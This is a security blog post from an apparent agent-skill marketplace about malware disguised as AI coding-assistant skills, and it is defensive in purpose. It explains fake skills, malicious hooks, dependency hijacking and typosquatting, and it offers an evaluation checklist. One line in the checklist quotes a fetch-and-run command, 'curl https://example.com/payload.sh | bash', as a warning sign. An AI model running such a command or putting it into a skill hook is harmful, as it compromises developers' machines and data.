Blog / The Security Risk Hiding Inside AI Agent Skills
Security

The Security Risk Hiding Inside AI Agent Skills

As AI coding assistants like Claude Code go mainstream, attackers are packaging malware as 'agent skills.' Here's how the attack works, what to look for, and how to stay safe.

SkillSpot

Earlier today, our scanner flagged a submission called nano-banana-prompts.

The repo had a README and a ZIP archive. No skill source. No .md file. No CLAUDE.md. Just a README telling you to download and run nano-banana-prompts.exe — an unsigned binary with no checksums, no code signing, and no explanation of what it actually does.

We blocked it. But the fact that it got submitted is a signal: the AI agent skills ecosystem has a security problem that nobody’s talking about yet.

Why AI skills are an attractive attack vector

A year ago, “install a Claude Code skill” was a thing only developers knew about. Today, hundreds of thousands of people are installing agent skills to supercharge their AI coding assistants — giving those assistants new abilities, new knowledge, new tools.

The trust model is simple: you run a slash command, a Markdown file gets added to your project, and your agent suddenly knows how to deploy to Vercel, triage Sentry errors, or manage Supabase schemas.

That simplicity is the vulnerability. Users have been trained to install skills quickly, with low friction. Attackers are exploiting that habit.

The attack patterns we’re seeing

1. Fake skills with real-looking names

nano-banana-prompts is obviously suspicious. But that’s not always how these show up.

More sophisticated attempts use names like claude-deploy-helper, ai-dev-toolkit, or codex-booster — names that sound like legitimate tools. The README is polished. The GitHub profile has a few other repos (often forked). There’s even a fake star count inflated through networks of bot accounts.

The skill itself is missing — replaced by a download link for an executable.

2. Skills that do something useful and something harmful

A more advanced variant actually works. The skill file contains legitimate instructions. But it also triggers a hook that runs an external command — fetching a payload, exfiltrating environment variables, or establishing persistence on the developer’s machine.

Claude Code’s hooks system (which runs shell commands in response to events like file saves or conversation starts) is legitimately powerful. A malicious skill can abuse it.

3. Dependency hijacking

Some skills require external scripts or MCP servers. A malicious skill points to a compromised npm package or a Python library with an obfuscated install hook. You install the skill; the skill installs the malware.

4. Typosquatting official skills

Anthropic and major vendors publish official skills under predictable names. sentry-fix-issues is real. sentry-fix-issue (missing the ‘s’) might not be. These typosquats are short-lived but effective — they catch developers who tab-complete or misremember the exact name.

What legitimate skills look like

A well-built, trustworthy skill has a few things in common:

Source transparency. You can read what the skill does before installing it. The CLAUDE.md or skill Markdown file is in the repo, not hidden behind a download. You don’t need to run anything to see the instructions.

No binary downloads. Skills are instruction sets. They’re text. Legitimate skills don’t need you to run an .exe, .dmg, or unsigned shell script as part of installation.

Conservative permissions. Good skills ask for the access they need and nothing else. A deployment skill needs write access to your build config. It doesn’t need access to your .env files or SSH keys. If a skill asks for more than it needs, that’s a red flag.

Reputable publisher. First-party skills from Anthropic, Vercel, Cloudflare, Sentry, and similar are reviewed and maintained by the tool’s actual team. Community skills from known developers with a track record of open-source contributions carry more trust than anonymous submissions.

A real README. Legitimate skill authors explain what their skill does, how it works, and what it needs. A README that’s 90% “download this installer” is not a README — it’s a funnel.

How to evaluate a skill yourself

Before installing any community skill, spend 90 seconds on this checklist:

1. Read the source. Go to the GitHub repo. Find the .md or CLAUDE.md file. Read it. If there’s no source file — just a README with a download link — don’t install.

2. Check the hooks. If the skill includes hooks (commands that run automatically), read what they do. echo "starting" is fine. curl https://example.com/payload.sh | bash is not.

3. Look at the publisher’s history. When was the account created? What else have they shipped? A new account with one repo and no history is higher risk than an established developer with years of contributions.

4. Search for the skill name. See if anyone in the community is talking about it — positively or negatively. SkillSpot, Reddit’s r/ClaudeAI, and the Anthropic Discord are good places to check.

5. Isolate new installs. When trying a skill from an unfamiliar source, test it in a throwaway project directory rather than your main codebase. Check what files it touches before trusting it with your real work.

What SkillSpot does to protect you

When a community skill gets submitted to SkillSpot, it goes through several layers before it appears in our directory:

Automated scanning. Every submission is checked for binary download links, unsigned executables, suspicious hook patterns, and README language that matches known social engineering patterns.

Manual review for flagged skills. Anything the automated scan flags gets reviewed by a human. The nano-banana-prompts submission was flagged automatically for the binary link, then confirmed malicious in manual review.

Security status tagging. Every skill in our directory has a securityStatus field — passed, flagged, or pending. You can filter by this field. Skills that haven’t been reviewed are marked pending and prominently noted.

Ongoing re-scans. A skill that passes today might be compromised tomorrow if the upstream repo is hijacked. We re-scan published skills regularly, not just on submission.

Community reporting. If you find a skill that looks wrong — here or anywhere else in the ecosystem — you can report it. We’ll review and share our findings publicly.

The broader problem: the ecosystem is too trusting

Claude Code, Codex, Cursor, and similar tools have made installing extensions feel as easy as typing a slash command. That’s by design — friction is the enemy of adoption.

But the defaults in most agent frameworks assume a trust level that the ecosystem hasn’t earned yet. A few things that would help:

  • Signed skills. The same way macOS requires code signing for apps, agent platforms could require publisher signing for skills. An unsigned skill would show a clear warning.
  • Sandboxed execution. Skills that need to run commands should run them in a sandboxed environment with explicit capability grants — not with the full permissions of the developer’s shell.
  • Platform-level scanning. Anthropic and other AI companies should run security scans on skills surfaced through their official channels, not leave it entirely to third parties.

Until those platform-level protections exist, the burden falls on marketplaces like SkillSpot and on developers themselves to be skeptical.

The state of the ecosystem today

The AI agent skills ecosystem is genuinely valuable. The 258 skills in our directory — from Vercel’s deployment skill to community-built tools for DeFi analytics, Kubernetes management, and UI design — represent real productivity gains for real developers.

Bad actors don’t change that. But they do raise the stakes for how the ecosystem handles trust.

We flagged one malware attempt today. There will be more. Our job is to make sure they don’t reach you.


Browse 258 security-scanned agent skills at SkillSpot

Want to report a suspicious skill? Open an issue on GitHub or mention us on X at @skillspotdev.

security agent skills claude code malware open source
Added to wishlist